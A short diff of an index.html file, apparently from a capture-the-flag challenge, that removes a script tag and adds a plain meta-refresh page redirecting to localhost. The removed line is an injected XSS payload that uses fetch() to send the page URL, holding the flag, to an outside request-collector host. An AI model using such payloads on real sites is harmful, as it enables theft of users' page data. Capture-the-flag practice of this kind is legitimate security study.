--- a/index.html
+++ b/index.html
@@ -1,1 +1,11 @@
-<script src="https://bot-invasion.challenge.tjcsec.club/js?q=fetch('https://eo62lwd3xgz14zy.m.pipedream.net/?flag='%2Blocation.href)"></script>
+<!DOCTYPE html>
+<html>
+<head>
+    <title>Redirecting...</title>
+    <!-- This meta tag redirects the user after 0 seconds -->
+    <meta http-equiv="refresh" content="0; url=http://127.0.0.1">
+</head>
+<body>
+    <p>If you are not redirected automatically, please click this link: <a href="http://127.0.0.1">Return to Localhost</a>.</p>
+</body>
+</html>
